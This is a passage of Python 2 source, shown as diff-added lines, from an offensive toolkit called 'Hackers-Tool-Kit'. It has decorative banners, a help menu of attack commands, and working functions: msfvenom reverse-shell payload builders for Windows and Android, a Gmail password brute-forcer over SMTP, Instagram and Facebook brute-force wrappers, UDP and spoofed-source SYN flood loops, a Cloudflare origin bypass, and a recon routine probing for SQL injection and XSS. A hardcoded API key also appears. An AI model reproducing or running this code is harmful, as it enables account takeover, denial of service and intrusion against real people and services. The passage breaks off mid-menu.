B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') +def mainbanner20(): + print """ + + + ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ + ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ +██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ +╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ + ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ + ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ + Created by @tuf_unkn0wn type ? for help + + """.decode('utf-8') +def mainbanner21(): + os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,21) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() + if num == 20: + mainbanner20() + if num == 21: + mainbanner21() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +update : update the hackers-tool-kit +clear : clears screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +compilec: compile a c file +dnsspoof: dns spoofing [type dnsspoofall to spoof entire subnet] +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("MODE> ") + ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | 